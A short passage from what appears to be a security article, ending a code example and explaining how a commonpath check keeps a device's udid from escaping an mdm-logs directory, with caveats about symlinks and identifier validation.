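except ValueError as exc:
    print("rejected:", exc)
```

commonpath compares whole path components, so a sibling such as mdm-logs2 is not mistaken for a child of mdm-logs, as a plain startswith test could be. A lexical check like this does not follow junctions or symlinks. A fuller fix would also validate udid against the expected device-identifier format.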



Source: freebuf.com, 2020-12-21 15:23:38, by 奇安信代码卫士 (QiAnXin Code Guard)
